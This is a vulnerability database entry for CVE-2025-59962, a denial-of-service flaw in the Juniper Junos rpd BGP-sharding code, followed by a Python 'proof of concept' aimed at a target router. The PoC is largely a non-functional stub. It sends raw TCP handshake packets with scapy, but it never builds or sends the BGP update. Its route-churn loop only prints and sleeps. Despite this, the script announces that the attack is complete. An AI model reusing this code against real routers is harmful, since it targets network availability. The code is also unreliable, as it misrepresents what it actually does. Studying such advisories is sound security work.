Security Vulnerability Report
CVE-2025-59962 CVSS 5.3 MEDIUM

Published: 2025-10-09 16:15:46
Last Modified: 2026-01-23 18:36:28

Description

An Access of Uninitialized Pointer vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved with BGP sharding configured allows an attacker triggering indirect next-hop updates, along with timing outside the attacker's control, to cause rpd to crash and restart, leading to a Denial of Service (DoS).

With BGP sharding enabled, triggering route resolution of an indirect next-hop (e.g., an IGP route change over which a BGP route gets resolved), may cause rpd to crash and restart. An attacker causing continuous IGP route churn, resulting in repeated route re-resolution, will increase the likelihood of triggering this issue, leading to a potentially extended DoS condition.

This issue affects:

Junos OS:
* all versions before 21.4R3-S6,
* from 22.1 before 22.1R3-S6,
* from 22.2 before 22.2R3-S3,
* from 22.3 before 22.3R3-S3,
* from 22.4 before 22.4R3,
* from 23.2 before 23.2R2;

Junos OS Evolved:
* all versions before 22.3R3-S3-EVO,
* from 22.4 before 22.4R3-EVO,
* from 23.2 before 23.2R2-EVO.

Versions before Junos OS 21.3R1 and Junos OS Evolved 21.3R1-EVO are unaffected by this issue.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:r1-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:r1-s2:*:*:*:*:*:* - VULNERABLE
Junos OS < 21.4R3-S6
Junos OS 22.1 < 22.1R3-S6
Junos OS 22.2 < 22.2R3-S3
Junos OS 22.3 < 22.3R3-S3
Junos OS 22.4 < 22.4R3
Junos OS 23.2 < 23.2R2
Junos OS Evolved < 22.3R3-S3-EVO
Junos OS Evolved 22.4 < 22.4R3-EVO
Junos OS Evolved 23.2 < 23.2R2-EVO

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-59962 - Juniper Junos OS rpd Uninitialized Pointer DoS PoC

This PoC demonstrates the concept of triggering BGP indirect next-hop
re-resolution to cause rpd crash via uninitialized pointer access.

Note: This requires:
1. Adjacent network access to the target Juniper device
2. BGP sharding enabled on the target
3. BGP session established with the target
4. Indirect next-hop routes configured
"""

import time
import random

from scapy.all import IP, TCP, send, sr1
from scapy.contrib.bgp import BGPUpdate  # BGP layers live in scapy.contrib.bgp

TARGET_IP = "192.168.1.1"  # Target Juniper device
BGP_PORT = 179
LOCAL_AS = 65001
TARGET_AS = 65000


def establish_bgp_session():
    """Establish BGP session with the target router"""
    # TCP three-way handshake
    syn = IP(dst=TARGET_IP) / TCP(dport=BGP_PORT,
                                  sport=random.randint(1024, 65535),
                                  flags="S")
    syn_ack = sr1(syn, timeout=5)
    if syn_ack:
        ack = IP(dst=TARGET_IP) / TCP(dport=BGP_PORT,
                                      sport=syn_ack[TCP].dport,
                                      seq=syn_ack[TCP].ack,  # value the peer acknowledged
                                      ack=syn_ack[TCP].seq + 1,
                                      flags="A")
        send(ack)
        print("[+] TCP session established")
        return True
    return False


def advertise_indirect_nexthop():
    """Advertise BGP routes with indirect next-hop"""
    # Advertise routes that will require IGP-based next-hop resolution
    bgp_update = BGPUpdate()  # Placeholder UPDATE object; never populated or sent
    # BGP UPDATE message with NLRI pointing to indirect next-hop
    print("[+] Advertising BGP routes with indirect next-hop")
    # In real scenario, use ExaBGP or similar tool to send BGP updates
    return True


def trigger_igp_route_churn():
    """Trigger IGP route changes to cause BGP re-resolution"""
    print("[*] Triggering IGP route churn to force BGP re-resolution...")
    for i in range(100):
        # Send OSPF LSA updates or IS-IS LSPs to cause route changes
        # This forces rpd to re-resolve indirect next-hops
        print(f"[*] Route churn iteration {i+1}/100")
        time.sleep(0.1)  # Fixed pause between iterations; this stub sends no IGP traffic


def main():
    print("=" * 60)
    print("CVE-2025-59962 PoC - Juniper rpd DoS")
    print("=" * 60)

    if not establish_bgp_session():
        print("[-] Failed to establish BGP session")
        return

    if not advertise_indirect_nexthop():
        print("[-] Failed to advertise routes")
        return

    print("[+] Waiting for BGP convergence...")
    time.sleep(30)

    trigger_igp_route_churn()
    print("[+] Attack complete - check if rpd has crashed")


if __name__ == "__main__":
    main()
```
